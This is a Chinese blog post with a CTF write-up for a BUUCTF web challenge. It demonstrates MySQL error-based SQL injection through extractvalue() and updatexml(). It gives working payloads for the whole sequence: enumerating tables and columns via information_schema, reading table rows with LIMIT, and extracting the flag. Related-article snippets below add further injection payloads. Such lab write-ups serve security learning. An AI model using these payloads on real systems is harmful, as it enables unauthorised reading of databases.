【Web方向】 1-2 SQL injection实例02_报错注入

已于 2022-11-14 17:22:26 修改
阅读量256 收藏 1
点赞数 3
分类专栏: WEB学习专栏 SQL注入 WP-CTF 文章标签: sql 数据库 mysql
于 2022-11-05 23:00:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanderer__/article/details/127706210
版权

报错注入实例

题目靶机来自buuctf第二周web方向注入题,经过我的测试,发现之前的union联合注入不管用了,这里要用到报错注入
在这里插入图片描述
union注入抓不到有效数据:
在这里插入图片描述

一、判断是否符合用extractvalue()报错注入

先假设可以报错注入,先草草抓一下version()的数据,下面进行小小的注入调试。
注入姿势:id=' and(select extractvalue(1,concat('~',(select version()))))#
在这里插入图片描述

说明

上图中系统回应的XPATH syntax error: '~10.1.47-MariaDB-0ubuntu0.18.04.'说明了报错注入的可行性,接下来可以故意让系统报错,并且将查询结果放在报错信息里,以XPATH syntax error: '信息'的形式爆出来,从而查看数据库中信息。

二、开始注入

1)扒取表名table_name

注入姿势:' and extractvalue(1,concat('~',select group_concat(table_name)from information_schema.tables where table_schema=database()))#
这里和之前union注入一样套路,从database()这个数据库中扒出information_schema里面的表名,效果如下:
在这里插入图片描述

2)查询列名

注入姿势:' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database())))#
在这里插入图片描述

3)查看文本

注入姿势:' and extractvalue(1,concat('~',(select group_concat(text) from wfy_comments)))#
结果如图:

在这里插入图片描述
这里可以看到文本不能全部输出,这里划重点,知识点来了

知识点

当数据表中有大量数据时,一次性查询出表中的全部数据会降低数据返回的速度,同时给数据库服务器造成很大的压力。这时就可以用 LIMIT 关键字来限制查询结果返回的条数。
LIMIT函数原型:limit 初始值,记录值
用到注入中就是:select <列名>,<列名>,...from <表名> limit <初始值>,<记录值>——检索从第<初始值>条开始,累加并显示<记录值>条id记录;
注入姿势:' and extractvalue(1,concat('~',(select text from wfy_comments limit 0,1)))#——检索第一行并单行输出
在这里插入图片描述

注意!
分行输出时前面不要用group_concat()了,否则所有文本拼成一行,用limit也无用啦!

4)查询目标行

在这里插入图片描述
最终抓出来XPATH syntax error: '~flag{Ju4t_m2ke_some_err0rs}'即为本题答案。

三、判断是否符合用updatexml()报错注入

说明

和extractvalue()报错一样,先假设可以报错注入,先草草抓一下version()的数据,下面进行小小的注入调试。
注入姿势:id=' and(select updatexml(1,concat('~',(select version())),2))#
在这里插入图片描述
以下updatexml()报错基本和extractvalue()报错一致,按照以上步骤操作即可,两种方法可根据实际情况使用。

枚瞰渐
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL-injection-detective.rar_Detective_sql injection_sql 注入_sql注入
09-23
本项目"SQL-injection-detective.rar"提供了一个用C#编写的简单SQL注入漏洞检测工具,旨在帮助开发者识别和修复这类安全隐患。 1. SQL注入原理:SQL注入发生时,用户输入的数据未经验证或过滤就直接被用于构建...
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
MySQL盲注(Blind SQL Injection)是一种特殊类型的SQL注入攻击,攻击者无法直接看到数据库的响应,而是通过观察应用程序的间接行为来判断是否存在漏洞或获取数据。这种攻击方式通常发生在目标系统对误信息进行了...
SQL注入基于注入2
Snowflake1997的博客
02-18 130
SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻..
buuctf-Fakebook(注入
m0_62094846的博客
04-04 2393
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,误会有,试试注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
BUUCTF之[极客大挑战 2019]HardSQL ----注入extractvalue和updatexml
weixin_44632787的博客
07-27 553
BUUCTF之[极客大挑战 2019]HardSQL ----注入extractvalue和updatexml 题目 经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词 一般来说,SQL注入有这4个步骤: 爆数据库:select database() 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas
BUUCTF web SQL注入
m0_55854679的博客
08-09 2820
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
BUUCTF【Web】随便注(SQL注入
qq_70434663的博客
03-02 537
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现提示表明此为单引号的SQL注入。第一步,测试注入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
6-SQL-injection.tar.gz_Security Measures_sql injection_sql injec
09-23
This document contains the source code for SQL injection. That is it contains different injections onto database or different sites databases and the security measures to avoid these injections is ...
SQL.rar_sql injection_sql 注入_sql注入
09-14
3. **SQL注入攻击实例**: - **经典的“单引号注入”**:攻击者输入`' OR '1'='1`,可能导致所有记录被返回,因为任何附加的条件都会变为真。 - **时间盲注**:如果应用无法正确处理查询时间,攻击者可能通过延时...
Havij-1.15-Pro-Advanced-SQL-Injection.rar_tool
09-19
hacking tool that would check wesite vulnnerability
BUUCTF-随便注
m0_74167420的博客
03-10 1496
注入注入是通过特殊函数误使用并使其输出误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数使其输出误结果来获取数据库的相关信息。堆叠注入:mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠注入其实就是通过结束符来执行多条sql语句。(1)盲注,构建payload:第一种payload:inurl?
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3812
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1149
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.注入用法5.二次注入
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4007
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试注入: 1'or(updatexml(1,concat...
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1291
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1250
SQL注入自学笔记,适合小白,包括union注入注入,与盲注
BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(注入
qq_44657899的博客
03-12 2155
这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。 然后学会了一种新的思路 0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f')) 脚本: import requests import time url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.n...
记BUUCTF SQL注入大合集
fly夏天的博客
06-02 2718
SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。 1.强网杯2019随便注 尝试 1 'and '1'='1 成功回显,存在注入点。 但是题目有很强的过滤。 考虑堆叠注入。 由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有 show databases //查询数据库名称 show tables / show tables from db_name //查询(指定数据库)表名 show engines...
SQL Server内置的HTAP技术
最新发布
2401_85789772的博客
07-22 655
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
eazy-sql注入
06-03
通常情况下,避免 SQL 注入的方法是使用参数化查询。具体来说,使用参数化查询可以将用户输入的数据与 SQL 查询语句分开,从而避免恶意用户在输入时注入恶意 SQL 代码。 如果你使用的是 eazy-sql,可以在查询时使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值